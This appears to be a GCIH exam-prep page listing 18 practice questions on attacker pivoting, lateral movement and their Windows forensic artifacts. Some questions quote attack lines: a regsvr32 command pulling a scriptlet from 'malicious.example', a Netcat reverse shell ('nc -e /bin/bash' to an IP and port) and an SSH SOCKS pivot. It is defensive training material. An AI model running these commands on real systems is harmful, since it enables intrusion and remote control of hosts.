You must be able to identify common endpoint pivoting techniques and their forensic evidence. The most important thing is knowing the primary artifact left by PsExec, because it is the key to tracking lateral movement across a network.
Start practicing
Endpoint Attack and Pivoting — choose a session length
Free · No account required
Domain overview
This domain covers how attackers move from a compromised endpoint to other systems, and the artifacts they leave behind. You must recognize malicious DLL persistence, token manipulation, WMI remote execution, and PsExec lateral movement. Questions present investigation scenarios and ask you to identify the technique, its purpose, or the evidence it creates on Windows systems.
Exam objectives
Identifying malicious DLL persistence in system directories loaded by a Windows service or process.
Explaining how token manipulation enables privilege escalation and lateral movement in Windows pivoting.
Recognizing WMI class and method combinations abused for remote process execution.
Tracking PsExec execution across a network via its primary forensic artifact.
Assuming PsExec leaves no remote artifacts; confusing service creation or event logs with the primary artifact.
Mixing up WMI classes and methods used for remote execution, such as Win32_Process and Create.
Believing token manipulation only escalates privileges locally, missing its role in pivoting to other systems.
Click any question to see the full explanation and answer options, or start a focused practice session above.
Refer to the exhibit. An attacker attempts to establish persistence by creating a new service. Why did the command fail?
2An attacker is using WMI (Windows Management Instrumentation) to move laterally. Which WMI class and method combination is frequently abused for remote process execution?
3During an investigation, you observe an attacker using 'PsExec' to move laterally. What is the primary artifact created by PsExec that can be used to track its execution across the network?
4An attacker has compromised a Linux host and is pivoting using a SOCKS proxy. Which tool is most commonly utilized for this purpose in a cross-platform environment?
5Why are 'Pass-the-Hash' (PtH) attacks effective for pivoting in a Windows environment?
6Which of the following describes the 'SMB Relay' attack during lateral movement?
7What is the primary function of the 'Token Manipulation' technique in Windows pivoting?
8An incident responder investigating a compromised Windows workstation discovers that an attacker established persistent command and control using a malicious DLL. The DLL was placed in a system directory and loaded by a legitimate, signed Microsoft binary through DLL search order hijacking. Which response action effectively remediates the persistence while preserving the legitimate binary and minimizing host downtime?
9An incident handler is analyzing a Windows endpoint where an adversary successfully executed a living-off-the-land binary (LotLB) to establish an unauthorized tunnel and pivot deeper into the internal network. Which TWO forensic artifacts should the analyst examine to reconstruct the command-line arguments and parent-child process creation chain associated with this execution? (Choose TWO)
10During an investigation of a compromised Windows 10 workstation, you observe the following command executed by a user process: `regsvr32.exe /s /u /i:https://malicious.example/payload.sct scrobj.dll`. The user has no legitimate reason to run regsvr32. Which attack technique is this command most indicative of?
11During an incident response on a Windows 10 endpoint, you observe that a malicious process has injected a thread into a remote process on the same host using the CreateRemoteThread API. The injected code is now executing in the context of a legitimate system process. Which of the following best describes the primary purpose of this technique from the attacker's perspective?
12An incident responder is examining a compromised Windows 10 workstation that an attacker used to pivot into the internal network. The responder runs `netstat -ano` and sees an established connection from the workstation to an internal server on TCP port 445, but no user has mapped a drive or accessed a share. Which of the following Windows artifacts would BEST reveal the remote service or process that initiated this SMB connection?
13A security analyst is reviewing logs from a compromised Linux server and notices that an attacker has created a reverse shell using Netcat. The command executed was: nc -e /bin/bash 192.168.1.100 4444. Which of the following best describes the attacker's objective?
14During an investigation, you discover that an attacker used the Windows utility 'schtasks' to create a scheduled task on a compromised endpoint. The task is configured to run a malicious executable every time a user logs on. Which of the following best describes the attacker's primary goal with this action?
15An attacker has compromised a Windows host and established a reverse shell using a malicious DLL loaded by a legitimate signed executable via DLL search order hijacking. The incident responder wants to identify the specific DLL that was hijacked and the process that loaded it. Which of the following data sources would provide the MOST direct evidence of the DLL load event and the loading process?
16An incident responder is investigating a Windows endpoint where an attacker used the Windows Management Instrumentation (WMI) event subscription mechanism to establish persistence. The responder wants to identify the specific WMI components created by the attacker. Which two of the following WMI artifacts should the responder examine to find the malicious event subscription? (Choose two.)
17An attacker has gained access to a Linux server and wants to use it as a pivot point to scan the internal network. The attacker executes `ssh -D 1080 user@compromised-server` from their machine. Which of the following best describes the capability this provides to the attacker?
18A compromised Windows 10 workstation has an active Meterpreter session. The responder observes that the attacker used the `portfwd` command to redirect traffic from the victim's TCP port 8080 to an internal HR server's TCP port 3389. The internal HR server is not directly reachable from the responder's analysis host. Which mechanism is the attacker leveraging to pivot into the HR server?
You must be able to identify common endpoint pivoting techniques and their forensic evidence. The most important thing is knowing the primary artifact left by PsExec, because it is the key to tracking lateral movement across a network.
The Courseiva GCIH question bank contains 18 questions in the Endpoint Attack and Pivoting domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Endpoint Attack and Pivoting domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included